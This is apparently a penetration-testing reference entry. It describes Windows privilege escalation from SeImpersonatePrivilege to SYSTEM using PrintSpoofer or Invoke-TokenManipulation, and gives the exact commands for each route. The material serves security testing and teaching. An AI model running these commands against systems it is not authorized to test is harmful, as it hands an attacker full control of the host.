← Back to search

PrintSpoofer Privesc (Windows Server 2019)

privescwindowstool

Summary

Abuse SeImpersonatePrivilege on Windows Server 2019 with PrintSpoofer to spawn an interactive SYSTEM process; Invoke-TokenManipulation is an alternative.

Walkthrough

When a service account holds SeImpersonatePrivilege (common for IIS/MSSQL), PrintSpoofer abuses the spooler named pipe to impersonate SYSTEM.

Steps

  1. Run PrintSpoofer32.exe -i -c cmd.exe (or powershell.exe) to get an interactive SYSTEM shell in your current session.
  2. As an alternative, import Invoke-TokenManipulation.ps1 and use -CreateProcess "cmd.exe" -ImpersonateUser "NT AUTHORITY\SYSTEM" to spawn a process under a stolen SYSTEM token.

Commands

cmd

PrintSpoofer32.exe -i -c cmd.exe

powershell

Import-Module .\Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -CreateProcess "cmd.exe" -ImpersonateUser "NT AUTHORITY\SYSTEM"